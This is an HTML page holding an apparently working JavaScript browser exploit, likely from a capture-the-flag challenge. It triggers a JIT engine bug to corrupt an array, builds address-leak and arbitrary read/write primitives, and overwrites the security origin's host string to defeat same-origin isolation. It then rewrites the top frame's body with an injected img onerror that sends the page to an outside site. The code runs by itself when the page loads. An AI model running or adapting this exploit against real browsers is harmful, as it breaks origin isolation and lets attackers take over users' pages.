<html> | |
<b>pwn</b> | |
</html> | |
<script> | |
/* Thanks to ptr-yudai of zer0pts, whose Discord log helped me write this exploit :) */
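// 8-byte scratch buffer shared by the two views below. Writing a value through
// one view and reading it back through the other reinterprets the same bits
// (double <-> unsigned 64-bit integer) with no numeric conversion in between.
const conversion_buffer = new ArrayBuffer(8);
const float_view = new Float64Array(conversion_buffer);
const int_view = new BigUint64Array(conversion_buffer);

// NOTE: extending native prototypes is normally discouraged, but the rest of
// this file calls these as methods (x.hex(), x.i2f(), d.f2i()), so the
// interface is kept unchanged.

/**
 * Format a BigInt as a hex literal, e.g. 255n -> "0xff".
 * Fix: a negative value used to render as "0x-ff" (not a valid literal); it
 * now renders as "-0xff". Output for non-negative values is unchanged.
 * @returns {string}
 */
BigInt.prototype.hex = function () {
  const digits = this.toString(16);
  return digits.startsWith('-') ? `-0x${digits.slice(1)}` : `0x${digits}`;
};

/**
 * Reinterpret the low 64 bits of this BigInt as an IEEE-754 double.
 * Values outside [0, 2^64) wrap modulo 2^64 (BigUint64Array store semantics).
 * @returns {number}
 */
BigInt.prototype.i2f = function () {
  int_view[0] = this;
  return float_view[0];
};

/**
 * Reinterpret this double's bit pattern as an unsigned 64-bit BigInt.
 * Inverse of BigInt.prototype.i2f for every non-NaN bit pattern.
 * @returns {bigint}
 */
Number.prototype.f2i = function () {
  float_view[0] = this;
  return int_view[0];
};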
/**
 * Heap-pressure helper: allocate and immediately drop 0x10000 empty
 * ArrayBuffers, presumably to coax the engine into running a garbage
 * collection before and after the JIT warm-up in pwn().
 * Returns nothing; the allocation churn is the only effect.
 */
function gc() {
  let remaining = 0x10000;
  while (remaining > 0) {
    void new ArrayBuffer(); // allocated only to be discarded
    remaining -= 1;
  }
}
/*
 * Exploit driver. Every field offset below (0x18, 0x80, 0x110, 0x10, 0x20,
 * 0x1c, 0x40000) is a hard-coded literal and nothing in this file derives it
 * at runtime, so it presumably matches only the browser build it was taken
 * from. Sequence:
 *   1. warm up jitme() so it gets JIT-compiled, then call it with `true` to
 *      obtain an array whose bounds are no longer enforced (corrput_arr);
 *   2. use one out-of-bounds write from that array to corrupt the neighbouring
 *      double array (rwarr), which afterwards serves as a window onto adjacent
 *      heap memory, including the LeakArrayBuffer allocated right after it;
 *   3. build addrof / arbitrary read / arbitrary write primitives on top of
 *      that by repointing the LeakArrayBuffer's backing store;
 *   4. walk from `window` to what the log messages call the security context
 *      and overwrite the first bytes of its host string;
 *   5. try to read, then replace, top.document.body.innerHTML.
 * Which heap fields rwarr[4], rwarr[5] and rwarr[9] overlap is not spelled out
 * anywhere in the code; the comments below only describe how they are used.
 */
function pwn()
{
    /* ArrayBuffer subclass with one extra property. addrof() stores an object
     * into `slot` and reads the stored value back through rwarr[9]; the 0xb33f
     * initial value is just a recognisable marker. */
    class LeakArrayBuffer extends ArrayBuffer {
        constructor(size) {
            super(size);
            this.slot = 0xb33f;
        }
    }
    /* Bug trigger. Interpreted, `a === true` makes Math.max() return
     * 0xFFFFFFFF, the subtraction negative and Math.sign() return -1, so
     * `new Array(-1)` would throw a RangeError. The exploit relies on the
     * JIT-compiled version (after the 0x10000 warm-up calls with `false`
     * below) not raising; the array that comes back is then written past its
     * end at index 12 (corrput_arr[12] = ...). The precise engine bug is not
     * documented here — see the credit at the top of the file.
     * local_arr and buff are allocated right after arr so that they land next
     * to it on the heap; local_arr[0] = 5.1 presumably makes local_arr hold
     * raw doubles that f2i()/i2f() can later reinterpret. */
    function jitme(a) {
        var x = -1;
        if (a) x = 0xFFFFFFFF;
        var arr = new Array(Math.sign(0 - Math.max(0, x, -1)));
        arr.shift();
        var local_arr = Array(2);
        local_arr[0] = 5.1;
        var buff = new LeakArrayBuffer(0x1000);
        arr[0] = 0x1122;
        return [arr, local_arr, buff];
    }
    /* Cause bug */
    gc();
    console.log("[+] START");
    // Origin before tampering, for comparison with the line printed after the write.
    console.log("[+] window.origin now " + window.origin);
    // Warm-up: enough calls with the benign argument to get jitme() optimised.
    for (var i = 0; i < 0x10000; ++i)
        jitme(false);
    gc();
    // NOTE: these three are implicit globals (no var/let). That works in this
    // sloppy-mode inline script but would throw in strict mode / a module.
    [corrput_arr, rwarr, corrupt_buff] = jitme(true);
    // The single out-of-bounds write. Index 12 presumably overlaps rwarr's
    // length field, since rwarr[4..9] are read and written freely below even
    // though rwarr was created as Array(2).
    corrput_arr[12] = 0x22444;
    delete corrput_arr;   // drop the implicit global so the mis-sized array is never touched again
    /* Primitives */
    /* Repoint corrupt_buff's backing store. NOTE the misleading parameter
     * names: every caller passes (addr >> 32n, addr & 0xffffffffn), so `l`
     * receives the HIGH half and `h` the LOW half of the address. The 64-bit
     * pointer is written straddling two doubles — low half into the upper
     * 32 bits of rwarr[4], high half into the lower 32 bits of rwarr[5] —
     * i.e. it is treated as starting 4 bytes into rwarr[4]. The other half of
     * each slot is read back first and preserved. */
    function set_backing_store(l, h) {
        rwarr[4] = ((h << 32n) | (rwarr[4].f2i() & 0xffffffffn)).i2f();
        rwarr[5] = ((rwarr[5].f2i() & 0xffffffff00000000n) | l).i2f();
    }
    /* addrof: park `o` in corrupt_buff.slot, then read that slot through
     * rwarr[9] as raw bits. The -1n presumably strips a pointer tag; only the
     * low 32 bits are returned — the upper half is recovered separately below. */
    function addrof(o) {
        corrupt_buff.slot = o;
        return (rwarr[9].f2i() - 1n) & 0xffffffffn;
    }
    var corrupt_view = new DataView(corrupt_buff);   // all arbitrary reads/writes go through this view
    var corrupt_buffer_ptr_low = addrof(corrupt_buff);
    console.log("[+] leak = " + corrupt_buffer_ptr_low.hex());
    /* Fake obj */
    // Recover the upper 32 bits of the heap address. idx0Addr is presumably
    // the address of rwarr[0]; baseAddr is the next 0x40000-aligned address
    // above the leak, and the 32-bit word at baseAddr + 0x1c is presumably
    // half of a full 64-bit pointer stored in some page/chunk header. `delta`
    // turns that address into an element index into rwarr; the branch picks
    // the lower or upper half of the 8-byte element depending on alignment,
    // and either way leaves the word in the upper 32 bits of addr_upper.
    var idx0Addr = corrupt_buffer_ptr_low - 0x10n;
    var baseAddr = (corrupt_buffer_ptr_low & 0xffff0000n) - ((corrupt_buffer_ptr_low & 0xffff0000n) % 0x40000n) + 0x40000n;
    var delta = baseAddr + 0x1cn - idx0Addr;
    var addr_upper;
    if ((delta % 8n) == 0n) {
        var baseIdx = delta / 8n;
        addr_upper = (rwarr[baseIdx].f2i() & 0xffffffffn) << 32n;
    } else {
        var baseIdx = ((delta - (delta % 8n)) / 8n);
        addr_upper = rwarr[baseIdx].f2i() & 0xffffffff00000000n;
    }
    console.log("[+] upper = " + addr_upper.hex());
    /* Arbitrary 64-bit read: repoint the backing store at addr, read 8 bytes
     * (little-endian) and return them as a BigInt. */
    function aar64(addr) {
        set_backing_store(addr >> 32n, addr & 0xffffffffn);
        return corrupt_view.getFloat64(0, true).f2i();
    }
    /* Arbitrary 64-bit write of a BigInt `value`. The value passes through a
     * double via i2f(), so NaN bit patterns may not survive the trip.
     * Not used below. */
    function aaw64(addr, value) {
        set_backing_store(addr >> 32n, addr & 0xffffffffn);
        corrupt_view.setFloat64(0, value.i2f(), true);
    }
    /* Arbitrary 32-bit write of a Number `value`, little-endian. */
    function aaw32(addr, value) {
        set_backing_store(addr >> 32n, addr & 0xffffffffn);
        corrupt_view.setInt32(0, value, true);
    }
    /* Arbitrary 8-bit write. setInt8 takes two arguments; the third is
     * ignored (a single byte has no endianness). Not used below. */
    function aaw8(addr, value) {
        set_backing_store(addr >> 32n, addr & 0xffffffffn);
        corrupt_view.setInt8(0, value , true);
    }
    // `+` binds tighter than `|`, so this is addr_upper | (addrof(window) + 0x18n):
    // the low 32 bits of window's address plus 0x18, joined with the recovered upper half.
    var addr_window = addr_upper | addrof(window) + 0x18n;
    console.log("[+] window = " + addr_window.hex());
    // From here on the walk follows the hard-coded offsets; the names in the
    // log messages are the author's, the code itself only dereferences.
    var addr_ldomwin = aar64(addr_window) + 0x80n;
    console.log("[+] LoclDOMWindow = " + addr_ldomwin.hex());
    var get_sec_origin = aar64(addr_ldomwin + 0x110n);
    console.log("[+] sec_origin_context " + get_sec_origin.hex());
    var addr_sec = aar64(get_sec_origin + 0x110n + 0x10n);
    console.log("[+] security_context = " + addr_sec.hex())
    //var port = aar64(addr_sec+0x20n); // you can spoof the port which is at +0x20 from sec
    //console.log("[+] port = " + port.hex())
    var sec_host = aar64(addr_sec+0x18n);
    console.log("[+] host String = " + sec_host.hex())
    // Overwrite the first four bytes at sec_host with "some" (0x656d6f73
    // little-endian = 's','o','m','e'). This is the whole point of the walk:
    // the value of window.origin is printed again right after, and the
    // try block below checks whether `top` is now treated as same-origin.
    aaw32(sec_host, 0x656d6f73) //p32(0x656d6f73) = some
    console.log("[+] window.origin after exp = "+window.origin)
    try{
        console.log("[+] Accessing top.document.body.innerHTML ")
        console.log(top.document.body.innerHTML);
        // Replaces the top frame's body with an <img> whose onerror navigates
        // the top frame to the author's site — a visible proof of control.
        top.document.body.innerHTML = '<img src=x onerror="location=`http://mws.rce.ee/`">'
    }
    catch(e){
        // Reached when the cross-origin access is still refused.
        console.log("sed lyf")
    }
}
// Entry point: the exploit runs as soon as the script element is evaluated.
pwn();
</script> |